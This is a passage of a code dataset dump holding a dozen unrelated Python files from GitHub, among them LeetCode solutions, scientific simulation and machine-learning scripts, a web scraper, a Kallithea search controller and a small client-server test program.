number_of_dirs)\nprint(\"Set the first mixer to simulate :\")\nstart = int(input())\nprint(\"Set the last mixer to simulate :\")\nstop = int(input())\n\ntotal_mixer = stop - start + 1\n\nnumber_of_mixers = np.linspace(start,stop,total_mixer,dtype=int)\n\nfor i in number_of_mixers:\n    geo_path = path + '/mixer_' + str(i)\n    os.chdir(geo_path)\n\n    path, dirs, files = next(os.walk(geo_path))\n    for j in np.linspace(1, len(dirs), len(dirs), dtype=int):\n        os.chdir(geo_path + '/mixer_' + str(j))\n        try:\n            with open(\"torque.00.dat\",\"r\") as fic_torque:\n                lines = fic_torque.readlines()\n                fic_torque.close()\n\n            if len(lines) != 2:\n                raise\n\n            print(\"mixer_\" + str(i) + '-' + str(j) + \" is OK!\")\n\n        except:\n            print(\"********** \" + \"mixer_\" + str(i) + '-' + str(j) + \" will be launched again! 
**********\")\n            os.system('cp ../../new_launch.sh .')\n            os.system('sbatch -J ' + \"mixer_\" + str(i) + '-' + str(j) + ' new_launch.sh')\n","repo_name":"bibeauv/mixer-database","sub_path":"utilities/check_and_launch.py","file_name":"check_and_launch.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13587712664","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 1 12:54:10 2020\n\n@author: Nikola\n\"\"\"\n\nimport requests as reqs\nfrom bs4 import BeautifulSoup\n\ndef main():\n\turl = 'https://www.telegraf.rs/'\n\n\ttelegraf = reqs.get(url)\n\ttelegraf.raise_for_status()\n\n\tpage = BeautifulSoup(telegraf.text, 'html.parser')\n\n\t# each front-page headline sits in a grid-image-wrapper div\n\tall_news = page.findAll('div', {'class' : 'grid-image-wrapper'})\n\n\t# map article title -> article URL\n\tres = dict()\n\n\tfor news in all_news:\n\t\ttitle = news.a['title']\n\t\tlink = news.a['href']\n\t\tres[title] = link\n\n\treturn res\n\nif __name__ == '__main__':\n\tnews = main()\n\n\tfor k,v in news.items():\n\t\tprint(v)","repo_name":"SquareNode/stanjeportala","sub_path":"scripts/telegraf.py","file_name":"telegraf.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17204108190","text":"class Solution:\n    def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n        intervals.sort(key=lambda interval: interval[0])\n        res = [intervals[0]]\n        prev_end = intervals[0][1]\n        for i in range(1, len(intervals)):\n            interval = intervals[i]\n            start, end = interval\n            if start <= prev_end:\n                res[-1][1] = max(res[-1][1], end)\n            else:\n                res.append(interval)\n            prev_end = res[-1][1]\n        return res\n","repo_name":"hotsno/blind-75","sub_path":"solutions/56. Merge Intervals.py","file_name":"56. 
Merge Intervals.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"69869890981","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \n visited = [[False for _ in range(len(grid[0]))] for _ in range(len(grid))]\n \n count = 0\n \n for i in range(len(grid)):\n for j in range(len(grid[0])):\n \n if visited[i][j] == False and grid[i][j] == \"1\":\n self.dfs(i, j, visited, grid)\n count += 1\n \n return count\n \n \n \n def dfs(self, i, j, visited, grid):\n \n visited[i][j] = True\n \n if i-1 >= 0 and not visited[i-1][j] and grid[i-1][j] == \"1\":\n self.dfs(i-1, j, visited, grid)\n \n if i+1 <= len(grid) - 1 and not visited[i+1][j] and grid[i+1][j] == \"1\":\n self.dfs(i+1, j, visited, grid)\n \n if j - 1 >= 0 and not visited[i][j-1] and grid[i][j-1] == \"1\":\n self.dfs(i, j-1, visited, grid)\n \n if j + 1 <= len(grid[0]) - 1 and not visited[i][j+1] and grid[i][j+1] == \"1\":\n self.dfs(i, j+1, visited, grid)\n \n \n \n ","repo_name":"Vamsi995/LeetCode-Python","sub_path":"200-number-of-islands/200-number-of-islands.py","file_name":"200-number-of-islands.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74254274340","text":"from neuron import h\nimport random as rnd\nimport numpy as np\n\nclass stim_protocol():\n \n def __init__(self,\n cell,\n p,\n rank = 0):\n\n # Add parameters to protocol\n self.p = p\n self.seed = 123881\n rnd.seed(self.seed)\n # Start protocol\n self.stimulators = {}\n\n # Initial time lag\n start_next = 0\n\n # Stabilization of membrane potential\n start_next += 0\n\n # pre induction EPSP Test \n self.test_pre = h.NetStim()\n self.test_pre.start = start_next # start_next # ms\n self.test_pre.interval = 1e3/self.p['test_freq'] # ms -> 20 sec\n self.test_pre.number = int(self.p['time_on_initialization'] / self.test_pre.interval) # 200\n self.test_pre.noise = 0\n if p['check']:\n print(('Begin sim',start_next))\n \n self.nc_test_pre = []\n self.nc_test_pre_nmda = []\n for spine in cell.spines:\n self.nc_test_pre.append(h.NetCon(self.test_pre, spine.head.AMPA,0,0,1))\n self.nc_test_pre_nmda.append(h.NetCon(self.test_pre, spine.head.NMDA,0,0,1))\n self.stimulators['test_pre_spike_times'] = h.Vector()\n self.nc_test_pre[-1].record(self.stimulators['test_pre_spike_times'])\n\n start_next += self.p['time_on_initialization']\n if p['check']:\n print(('End PRE',start_next))\n \n\n # Induction protocol\n self.stim = h.NetStim()\n start_next += self.p['time_to_begin_induction']\n self.stim.start = start_next # ms\n self.p['time_start_induction_stimuli'] = self.stim.start\n self.stim.number = self.p['nstim'] # 200\n self.stim.interval = 1e3/self.p['induction_freq'] # ms 0.5 Hz = 2 s\n self.stim.noise = 0\n if p['check']:\n print(('Begin induction',start_next))\n \n\n self.nc_stim = []\n self.nc_stim_nmda = []\n synaptic_delays = np.linspace(0,p['sp_delay_env'],len(cell.spines))\n for spine,delay in zip(cell.spines,synaptic_delays):\n spine.delay = delay #rnd.uniform(0,p['sp_delay_env'])\n self.nc_stim.append(h.NetCon(self.stim, spine.head.AMPA,0,spine.delay,1))\n self.nc_stim_nmda.append(h.NetCon(self.stim, spine.head.NMDA,0,spine.delay,1))\n self.stimulators['induction_spikes'] = h.Vector()\n self.nc_stim[-1].record(self.stimulators['induction_spikes'])\n\n # during induction EPSP Test \n self.test_during = h.NetStim()\n self.test_during.start = 
start_next + 1e3/self.p['induction_freq']/2 # ms\n if p['check']:\n print((\"DURING\",self.test_during.start, 1e3/self.p['induction_freq']/2))\n self.test_during.interval = 1e3/self.p['test_freq'] # ms -> 20 sec\n self.test_during.number = int(self.stim.number*self.stim.interval / self.test_during.interval)\n self.test_during.noise = 0\n\n self.nc_test_during = []\n self.nc_test_during_nmda = []\n for spine in cell.spines:\n self.nc_test_during.append(h.NetCon(self.test_during, spine.head.AMPA,0,0,1))\n self.nc_test_during_nmda.append(h.NetCon(self.test_during, spine.head.NMDA,0,0,1))\n self.stimulators['test_during_spike_times'] = h.Vector()\n self.nc_test_during[-1].record(self.stimulators['test_during_spike_times'])\n\n # BPAP self.stimulation \n IC_dep = self.stimulators['IC_dep'] = []\n IC_hyp = self.stimulators['IC_hyp'] = []\n IC_delays = self.stimulators['IC_delays'] = []\n for s in range(self.p['nstim']):\n IC_dep.append([])\n IC_hyp.append([])\n IC_delays.append(start_next + self.stim.interval * s - p['IC_delay_to_spike'])\n for ap in range(4):\n IC_dep[-1].append(h.IClamp(0.5, sec = cell.cell.soma))\n IC_hyp[-1].append(h.IClamp(0.5, sec = cell.cell.soma))\n IC_dep[-1][ap].amp = p['BPAP_stimulus_amplitude'] # nA\n IC_dep[-1][ap].delay = IC_delays[-1] + ap*5# ms\n IC_dep[-1][ap].dur = p['BPAP_dep_stimulus_duration'] # ms\n\n IC_hyp[-1][ap].amp = -0.02 # nA\n IC_hyp[-1][ap].delay = IC_dep[-1][ap].delay + IC_dep[-1][ap].dur # ms\n IC_hyp[-1][ap].dur = p['BPAP_hyp_stimulus_duration'] # ms\n # self.stimulators['IC_dep'].append(h.IClamp(0.5, sec = cell.cell.branch_base))\n # self.stimulators['IC_hyp'].append(h.IClamp(0.5, sec = cell.cell.branch_base))\n # self.stimulators['IC_dep'][-1].amp = self.p['BPAP_stimulus_ampitude'] # nA\n # self.stimulators['IC_dep'][-1].delay = start_next + self.stim.interval * s - self.p['IC_delay_to_spike'] # ms\n # self.stimulators['IC_delays'].append(self.stimulators['IC_dep'][-1].delay)\n # self.stimulators['IC_dep'][-1].dur = self.p['BPAP_dep_stimulus_duration'] # ms\n\n # self.stimulators['IC_hyp'][-1].amp = -0.02 # nA\n # self.stimulators['IC_hyp'][-1].delay = self.stimulators['IC_dep'][-1].delay + self.stimulators['IC_dep'][-1].dur # ms\n # self.stimulators['IC_hyp'][-1].dur = self.p['BPAP_hyp_stimulus_duration'] # ms\n\n\n self.time_of_induction = self.p['nstim'] * self.stim.interval\n start_next += self.time_of_induction\n self.time_end_induction = start_next\n if p['check']:\n print(('End induction',start_next))\n\n # Post induction EPSP test during expression\n self.test_post = h.NetStim()\n start_next += self.p['time_after_induction']\n self.test_post.start = start_next # ms\n self.test_post.number = 1e4 \n self.test_post.interval = 1e3/self.p['test_freq'] # ms = 0.05 Hz = 20 sec\n self.test_post.noise = 0\n\n self.nc_test_post = []\n self.nc_test_post_nmda = []\n for spine in cell.spines:\n self.nc_test_post.append(h.NetCon(self.test_post, spine.head.AMPA,0,0,1))\n self.nc_test_post_nmda.append(h.NetCon(self.test_post, spine.head.NMDA,0,0,1))\n start_next += self.p['time_of_expression'] #ms\n self.stimulators['test_post_spike_times'] = h.Vector()\n self.nc_test_post[-1].record(self.stimulators['test_post_spike_times'])\n\n # cell.spines[0].head.plot('cai')\n # dend.plot('v')\n # # h('load_file(\"Tests/Test_ampa.ses\")')\n # # h('load_file(\"Tests/Test_ampa_30min.ses\")')\n\n # Remve the induction self.stimulus\n if self.p['activate_LTP_protocol']:\n self.stim.number = self.p['nstim']\n else:\n self.stim.number = 0\n\n ##### Initialization 
########\n h.v_init = self.p['Vrest'] # mV\n self.p['tstop'] = start_next\n h.init()\n if p['check']:\n print(('Setup finished on cpu %g tstop %g'%(rank,h.tstop)))\n\n\n","repo_name":"ModelDBRepository/244412","sub_path":"protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34774217224","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport logging\n\nimport torch\nimport torch.nn as nn\n# import timm\nimport math\nfrom .tokenpose_base import TokenPose_S_base\n\nBN_MOMENTUM = 0.1\nlogger = logging.getLogger(__name__)\n\nclass TokenPose_S(nn.Module):\n\n def __init__(self, cfg, **kwargs):\n\n extra = cfg.MODEL.EXTRA\n\n super(TokenPose_S, self).__init__()\n\n print(cfg.MODEL)\n ##################################################\n self.features = TokenPose_S_base(image_size=[cfg.MODEL.IMAGE_SIZE[1],cfg.MODEL.IMAGE_SIZE[0]],patch_size=[cfg.MODEL.PATCH_SIZE[1],cfg.MODEL.PATCH_SIZE[0]],\n num_keypoints = cfg.MODEL.NUM_JOINTS,dim =cfg.MODEL.DIM,\n channels=256,\n depth=cfg.MODEL.TRANSFORMER_DEPTH,heads=cfg.MODEL.TRANSFORMER_HEADS,\n mlp_dim = cfg.MODEL.DIM*cfg.MODEL.TRANSFORMER_MLP_RATIO,\n apply_init=cfg.MODEL.INIT,\n hidden_heatmap_dim=cfg.MODEL.HEATMAP_SIZE[1]*cfg.MODEL.HEATMAP_SIZE[0]//8,\n heatmap_dim=cfg.MODEL.HEATMAP_SIZE[1]*cfg.MODEL.HEATMAP_SIZE[0],\n heatmap_size=[cfg.MODEL.HEATMAP_SIZE[1],cfg.MODEL.HEATMAP_SIZE[0]],\n pos_embedding_type=cfg.MODEL.POS_EMBEDDING_TYPE)\n ###################################################3\n\n def forward(self, x):\n x = self.features(x)\n return x\n\n def init_weights(self, pretrained=''):\n if os.path.isfile(pretrained):\n logger.info('=> init final conv weights from normal distribution')\n for m in self.final_layer.modules():\n if isinstance(m, nn.Conv2d):\n logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))\n logger.info('=> init {}.bias as 0'.format(name))\n nn.init.normal_(m.weight, std=0.001)\n nn.init.constant_(m.bias, 0)\n\n pretrained_state_dict = torch.load(pretrained)\n logger.info('=> loading pretrained model {}'.format(pretrained))\n from collections import OrderedDict\n state_tmp = OrderedDict()\n for name, param in pretrained_state_dict.items():\n num = name.split(\".\")[1]\n if num != \"19\":\n continue\n state_tmp[name] = param\n\n self.load_state_dict(state_tmp, strict=False)\n else:\n logger.info('=> init weights from normal distribution')\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight, std=0.001)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.ConvTranspose2d):\n nn.init.normal_(m.weight, std=0.001)\n if self.deconv_with_bias:\n nn.init.constant_(m.bias, 0)\n\n\ndef get_pose_net(cfg, is_train, **kwargs):\n model = TokenPose_S(cfg, **kwargs)\n if is_train and cfg.MODEL.INIT_WEIGHTS:\n model.init_weights(cfg.MODEL.PRETRAINED)\n\n return model\n","repo_name":"leeyegy/TokenPose","sub_path":"lib/models/pose_tokenpose_s.py","file_name":"pose_tokenpose_s.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"35"} +{"seq_id":"27862143742","text":"dirs = {'^': 1j, 'v': -1j, '>': 1, '<': -1}\n\nhouses_p1, pos = set(), 0\nhouses_p2, pos1, pos2 = set(), 0, 0\nhouses_p1.add(0); houses_p2.add(0)\nfor i, d in 
enumerate(open('d03.txt').read()):\n pos += dirs[d]\n houses_p1.add(pos)\n if i % 2 == 0:\n pos1 += dirs[d]\n houses_p2.add(pos1)\n else:\n pos2 += dirs[d]\n houses_p2.add(pos2)\nprint(len(houses_p1))\nprint(len(houses_p2))","repo_name":"olamberti/advent-of-code","sub_path":"2015/d03.py","file_name":"d03.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"126080980","text":"import logging\nimport traceback\nimport urllib\nfrom pylons.i18n.translation import _\nfrom pylons import request, config, tmpl_context as c\n\nfrom whoosh.index import open_dir, EmptyIndexError\nfrom whoosh.qparser import QueryParser, QueryParserError\nfrom whoosh.query import Phrase, Prefix\nfrom webhelpers.util import update_params\n\nfrom kallithea.lib.auth import LoginRequired\nfrom kallithea.lib.base import BaseRepoController, render\nfrom kallithea.lib.indexers import CHGSETS_SCHEMA, SCHEMA, CHGSET_IDX_NAME, \\\n IDX_NAME, WhooshResultWrapper\nfrom kallithea.model.repo import RepoModel\nfrom kallithea.lib.utils2 import safe_str, safe_int\nfrom kallithea.lib.helpers import Page\n\nlog = logging.getLogger(__name__)\n\n\nclass SearchController(BaseRepoController):\n\n def __before__(self):\n super(SearchController, self).__before__()\n\n @LoginRequired()\n def index(self, repo_name=None):\n c.repo_name = repo_name\n c.formated_results = []\n c.runtime = ''\n c.cur_query = request.GET.get('q', None)\n c.cur_type = request.GET.get('type', 'content')\n c.cur_search = search_type = {'content': 'content',\n 'commit': 'message',\n 'path': 'path',\n 'repository': 'repository'\n }.get(c.cur_type, 'content')\n\n index_name = {\n 'content': IDX_NAME,\n 'commit': CHGSET_IDX_NAME,\n 'path': IDX_NAME\n }.get(c.cur_type, IDX_NAME)\n\n schema_defn = {\n 'content': SCHEMA,\n 'commit': CHGSETS_SCHEMA,\n 'path': SCHEMA\n }.get(c.cur_type, SCHEMA)\n\n log.debug('IDX: %s' % index_name)\n log.debug('SCHEMA: %s' % schema_defn)\n\n if c.cur_query:\n cur_query = c.cur_query.lower()\n log.debug(cur_query)\n\n if c.cur_query:\n p = safe_int(request.GET.get('page', 1), 1)\n highlight_items = set()\n try:\n idx = open_dir(config['app_conf']['index_dir'],\n indexname=index_name)\n searcher = idx.searcher()\n\n qp = QueryParser(search_type, schema=schema_defn)\n if c.repo_name:\n cur_query = u'repository:%s %s' % (c.repo_name, cur_query)\n try:\n query = qp.parse(unicode(cur_query))\n # extract words for highlight\n if isinstance(query, Phrase):\n highlight_items.update(query.words)\n elif isinstance(query, Prefix):\n highlight_items.add(query.text)\n else:\n for i in query.all_terms():\n if i[0] in ['content', 'message']:\n highlight_items.add(i[1])\n\n matcher = query.matcher(searcher)\n\n log.debug('query: %s' % query)\n log.debug('hl terms: %s' % highlight_items)\n results = searcher.search(query)\n res_ln = len(results)\n c.runtime = '%s results (%.3f seconds)' % (\n res_ln, results.runtime\n )\n\n def url_generator(**kw):\n q = urllib.quote(safe_str(c.cur_query))\n return update_params(\"?q=%s&type=%s\" \\\n % (q, safe_str(c.cur_type)), **kw)\n repo_location = RepoModel().repos_path\n c.formated_results = Page(\n WhooshResultWrapper(search_type, searcher, matcher,\n highlight_items, repo_location),\n page=p,\n item_count=res_ln,\n items_per_page=10,\n url=url_generator\n )\n\n except QueryParserError:\n c.runtime = _('Invalid search query. 
Try quoting it.')\n searcher.close()\n except (EmptyIndexError, IOError):\n log.error(traceback.format_exc())\n log.error('Empty Index data')\n c.runtime = _('There is no index to search in. '\n 'Please run whoosh indexer')\n except (Exception):\n log.error(traceback.format_exc())\n c.runtime = _('An error occurred during search operation.')\n\n # Return a rendered template\n return render('/search/search.html')\n","repo_name":"msabramo/kallithea","sub_path":"kallithea/controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"34298840304","text":"#!/usr/bin/env python3\nimport os\n\n\ndef speedpi():\n speedtest = \"/usr/local/bin/speedtest-cli \"\n # add arguments\n speedtest = speedtest + \"--csv \"\n # specify output file\n speedtest = speedtest + \">> speedpi/speedtests.csv\"\n\n # start the command\n os.system(speedtest)\n\n\nif __name__ == \"__main__\":\n speedpi()","repo_name":"hitbear/speedpi","sub_path":"src/speedpi.py","file_name":"speedpi.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73755954982","text":"\"\"\"\nPatient Excel Exporter.\n\nExports the current patient's details from the mongoDB database\n\"\"\"\n\nimport sys\nfrom datetime import datetime\nfrom os import chdir\nfrom os.path import exists\nfrom time import sleep\n\nimport numpy as np\nfrom openpyxl import Workbook\nfrom pymongo import MongoClient\n\nchdir(sys.argv[1]) if sys.argv[1] else sys.exit()\n\nclient = MongoClient('localhost', 27017)\ndb = client['mnd-dashboard']\npatients = db.patients.find()\n\n\ndef findClosestDate(date, array):\n \"\"\"Find the closest appointment to the date.\"\"\"\n diff = [abs(date - x).days for x in array]\n return np.argmin(diff)\n\n\ndest_filename = 'patientsExport.xlsx'\nwb = Workbook()\nws = wb.active\nheading = ['Name', 'DOB', 'DOD', 'Ethnicity', 'Onset date',\n 'Age at onset', 'Diagnosis date', 'Age at diagnosis',\n 'ALSFRS-R at diagnosis', 'ALSFRS-R at RIG', 'ALSFRS-R at NIV',\n 'ESS at diagnosis', 'ESS at RIG', 'ESS at NIV', 'Weight at Diagnosis', 'Weight before RIG',\n 'Weight on RIG date', 'RIG date', 'Age at RIG date',\n 'NIV date', 'Age at NIV date', 'Duration of disease',\n 'Place of death', 'MND Type']\nws.append(heading)\nfor p in patients:\n name = '%s %s' % (p['firstName'], p['lastName'])\n dob = p['dateOfBirth'].strftime('%d/%m/%Y') if p['dateOfBirth'] else None\n dod = p['deathDate'].strftime('%d/%m/%Y') if p['deathDate'] else None\n ethnicity = p['ethnicity']\n onset = p['onsetDate'].strftime('%d/%m/%Y') if p['onsetDate'] else None\n ageAtOnset = p['onsetDate'].year - p['dateOfBirth'].year if p['onsetDate'] else None\n diagnosisDate = p['diagnosisDate'].strftime('%d/%m/%Y') if p['diagnosisDate'] else None\n ageAtDiagnosis = p['diagnosisDate'].year - p['dateOfBirth'].year if p['diagnosisDate'] else None\n if 'appointments' in p:\n appointmentDates = np.array([x['clinicDate'] for x in p['appointments']])\n if p['diagnosisDate']:\n diagnosisIndex = findClosestDate(p['diagnosisDate'], appointmentDates)\n alsfrsAtDiagnosis = p['appointments'][diagnosisIndex]['alsfrs']['total']\n essAtDiagnosis = p['appointments'][diagnosisIndex]['ess']['total']\n weightAtDiagnosis = p['appointments'][0]['weight'] / 100\n else:\n alsfrsAtDiagnosis = None\n essAtDiagnosis = None\n weightAtDiagnosis = None\n if p['gastrostomyDate']:\n RIGindex 
= findClosestDate(p['gastrostomyDate'], appointmentDates)\n weightBeforeRIG = p['appointments'][RIGindex]['weight'] / 100\n alsfrsBeforeRIG = p['appointments'][RIGindex]['alsfrs']['total']\n essBeforeRIG = p['appointments'][RIGindex]['ess']['total']\n weightOnRIG = p['appointments'][-1]['weight'] / 100\n RIGdate = p['gastrostomyDate'].strftime('%d/%m/%Y')\n ageAtRIG = p['gastrostomyDate'].year - p['dateOfBirth'].year\n else:\n weightBeforeRIG = None\n alsfrsBeforeRIG = None\n essBeforeRIG = None\n weightOnRIG = None\n RIGdate = None\n ageAtRIG = None\n if p['nivDate']:\n NIVdate = p['nivDate'].strftime('%d/%m/%Y')\n ageAtNIV = p['nivDate'].year - p['dateOfBirth'].year\n if 'appointments' in p:\n NIVIndex = findClosestDate(p['nivDate'], appointmentDates)\n alsfrsAtNIV = p['appointments'][NIVIndex]['alsfrs']['total']\n essAtNIV = p['appointments'][NIVIndex]['ess']['total']\n else:\n alsfrsAtNIV = None\n essAtNIV = None\n else:\n alsfrsAtDiagnosis = None\n essAtDiagnosis = None\n weightAtDiagnosis = None\n\n weightBeforeRIG = None\n alsfrsBeforeRIG = None\n essBeforeRIG = None\n weightOnRIG = None\n RIGdate = None\n ageAtRIG = None\n\n NIVdate = None\n ageAtNIV = None\n alsfrsAtNIV = None\n essAtNIV = None\n durationofDisease = abs(datetime.now() - p['diagnosisDate']).days if p['diagnosisDate'] else None\n placeOfDeath = p['deathPlace']\n MNDType = p['mndType']\n data = [name, dob, dod, ethnicity, onset,\n ageAtOnset, diagnosisDate, ageAtDiagnosis,\n alsfrsAtDiagnosis, alsfrsBeforeRIG, alsfrsAtNIV, essAtDiagnosis, essBeforeRIG, essAtNIV, weightAtDiagnosis, weightBeforeRIG,\n weightOnRIG, RIGdate, ageAtRIG, NIVdate,\n ageAtNIV, durationofDisease, placeOfDeath, MNDType]\n ws.append(data)\n\nwb.save(filename=dest_filename)\nwhile not exists(dest_filename):\n sleep(1)\n","repo_name":"Darkbladecr/MND-patient-dashboard","sub_path":"server/apis/patientsExport.py","file_name":"patientsExport.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"845335959","text":"# coding = utf-8\n\nimport requests\nfrom lxml import html\n\nLOGIN_URL = 'https://github.com/login'\nSESSION_URL = 'https://github.com/session'\n\ns = requests.session()\nr = s.get(LOGIN_URL)\n\n#获取浏览器返回的HTML文本\ntree = html.fromstring(r.text)\n# 利用lxml中的xpath 获取有用的待提交的data信息\nel = tree.xpath('//input[@name=\"authenticity_token\"]')[0]\n\nauthenticity_token = el.attrib['value']\n\n# 构建数据信息\ndata = {\n 'commit': 'Sign in',\n 'utf8': '✓',\n 'authenticity_token': authenticity_token,\n 'login': username,\n 'password': password\n}\n\nheaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'\n}\n\nr = s.post(SESSION_URL, data=data, headers=headers)\n#print(r.text)\ntree = html.fromstring(r.text)\nprint(tree)\nel = tree.xpath('//ul[@class=\"mini-repo-list\"]')[0]\nprint(el)\n","repo_name":"superliuliuliu/pythonspider","sub_path":"gitspider.py","file_name":"gitspider.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7554580543","text":"def canAttendMeetings(intervals):\n # Sort the array first so that the starting time 
is in ascending order\n intervals.sort()\n\n # Need to do -1 so that it stays in bounds\n for i in range(len(intervals) - 1):\n # i1 = current meeting, i2 = next meeting\n i1 = intervals[i]\n i2 = intervals[i + 1]\n\n # If current meeting's end time is greater than next meeting's start time:\n if i1[1] > i2[0]:\n return False\n\n return True","repo_name":"nickyjhong/dsa","sub_path":"leetcode/easy/252-meetingRooms.py","file_name":"252-meetingRooms.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"43473141881","text":"import json\nfrom threading import Thread, Lock\nimport socket\nimport sys\nimport time\n\n\nclass Client():\n \"\"\"\n Client is initialized with client_port as a parameter\n \"\"\"\n def __init__(self, client_port):\n self.identifier = client_port\n self.server_tcp = ('127.0.0.1', 8889)\n self.lock = Lock()\n self.server_listener = SocketThread(\n self, client_port, self.server_tcp, self.lock)\n self.server_listener.start()\n self.server_message = []\n\n \"\"\"\n Used to send messages to the server.\n \"\"\"\n def send_msg(self, action, play=None, msg=None):\n message = json.dumps({\n \"action\": action,\n \"payload\": play,\n \"message\": msg,\n \"player_id\": self.identifier\n })\n\n self.sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock_tcp.connect(self.server_tcp)\n \"\"\"\n If the action is test then the client sends a message 50000 amounts to the server\n to measure how long it takes for the messages to arrive. The sleep is so that the\n server can prepare to accept messages.\n \"\"\"\n if action == 'test':\n self.sock_tcp.send(message.encode())\n time.sleep(1)\n for i in range(50000):\n self.sock_tcp.send(message.encode())\n self.sock_tcp.close()\n else:\n self.sock_tcp.send(message.encode())\n data = self.sock_tcp.recv(1024)\n self.sock_tcp.close()\n message = self.parse_data(data)\n\n print(message)\n\n \"\"\"\n Parses messages from the server if the succes code is True. If not raises an Exception\n \"\"\"\n\n def parse_data(self, data):\n try:\n data = json.loads(data)\n if data['success'] == \"True\":\n return data['message']\n else:\n raise Exception(data['message'])\n except ValueError:\n print(data)\n \"\"\"\n Gets servers messages to print\n \"\"\"\n def get_messages(self):\n\n message = self.server_message\n self.server_message = []\n return set(message)\n\n\nclass SocketThread(Thread):\n\n \"\"\"\n Initializes SocketThread which is used to listen to the servers messages.\n Initialized with servers address.\n \"\"\"\n def __init__(self, client, client_port, server_tcp, lock):\n\n Thread.__init__(self)\n self.client = client\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.bind((\"0.0.0.0\", int(client_port)))\n self.lock = lock\n self.time_reference = time.time()\n\n \"\"\"\n Recieves messages from the server and then prints them\n \"\"\"\n\n def run(self):\n\n while True:\n data, addr = self.sock.recvfrom(1024)\n self.lock.acquire()\n try:\n self.client.server_message.append(data)\n self.print_messages()\n finally:\n self.lock.release()\n\n def print_messages(self):\n\n messages = client.get_messages()\n if len(messages) != 0:\n for message in messages:\n message = json.loads(message)\n sender, value = message.popitem()\n print(sender, \" : \", value)\n\n\"\"\"\nInitializes the client and log-array. 
{"seq_id":"10634055004","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport os\n\nmnist = input_data.read_data_sets(\"./MNIST_data\", one_hot=True)\n\nbatch_size = 100\nn_batch = mnist.train.num_examples // batch_size\n\ntimes = 111\n\nx = tf.placeholder(dtype=tf.float32, shape=[None, 784])\ny = tf.placeholder(dtype=tf.float32, shape=[None, 10])\n\nw = tf.Variable(tf.random_uniform(shape=[784, 10], dtype=tf.float32))\nb = tf.Variable(tf.random_uniform(shape=[10], dtype=tf.float32))\nwx_b = tf.add(tf.matmul(x, w), b)\nprediction = tf.nn.softmax(wx_b)\n\n# Pass the raw logits here; softmax_cross_entropy_with_logits applies softmax itself,\n# so feeding the already-softmaxed prediction would apply softmax twice\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=wx_b))\n\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\ninit = tf.global_variables_initializer()\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(prediction, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsaver = tf.train.Saver()\n\n\ndef train():\n    with tf.Session() as sess:\n        sess.run(init)\n        for epoch in range(times):\n            for batch in range(n_batch):\n                batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n                sess.run(train_step, feed_dict={x: batch_xs, y: batch_ys})\n\n            acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels})\n            print(\"Iter \" + str(epoch) + \",Testing Accuracy \" + str(acc))\n        if not os.path.exists(\"E:/data/models/saver_save\"):\n            os.makedirs(\"E:/data/models/saver_save\")\n\n        saver.save(sess, \"E:/data/models/saver_save/test_model.ckpt\")\n\ndef restore(model):\n    with tf.Session() as sess:\n        sess.run(init)\n        print(sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels}))\n        saver.restore(sess, model)\n        print(sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels}))\n\n\n\nif __name__ == '__main__':\n
